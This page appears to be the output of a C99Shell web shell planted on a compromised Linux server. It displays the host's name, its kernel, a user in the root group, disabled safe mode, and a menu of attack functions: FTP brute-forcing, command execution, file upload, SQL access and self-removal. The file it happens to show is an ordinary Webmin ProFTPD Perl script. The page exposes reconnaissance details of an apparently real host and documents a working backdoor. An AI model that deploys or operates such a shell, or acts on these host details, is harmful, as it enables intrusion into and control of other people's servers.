!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/proftpd/   drwxr-xr-x
Free 28.27 GB of 117.98 GB (23.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     find_ftpaccess.cgi (1.01 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# find_ftpaccess.cgi
# Finds all per-directory options files under the all the document roots

require './proftpd-lib.pl';
&ReadParse();
@rv = grep { -r $_ } @ftpaccess_files;
&error_setup($text{'find_err'});

if ($in{'from'}) {
    # Look under the given directory
    @dirs = ( $in{'dir'} );
    }
else {
    # Look in Anonymous sections
    $conf = &get_config();
    $anon = &find_directive("Anonymous", $conf);
    push(@dirs, $anon) if ($anon);
    foreach $v (&find_directive_struct("VirtualHost", $conf)) {
        $anon = &find_directive("Anonymous", $v->{'members'});
        push(@dirs, $anon) if ($anon);
        }
    &error($text{'find_eanon'}) if (!@dirs);
    }

foreach $d (@dirs) {
    if ($d =~ /^~(\S+)$/) {
        local @u = getpwnam($1);
        $d = $u[7];
        next if (!$u[7]);
        }
    open(FIND, "find ".quotemeta($d)." -name .ftpaccess -print |");
    while(<FIND>) {
        s/\r|\n//g;
        push(@rv, $_);
        }
    close(FIND);
    }

# save results
$site{'ftpaccess'} = join(' ', &unique(@rv));
&write_file("$module_config_directory/site", \%site);
&redirect("ftpaccess.cgi");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--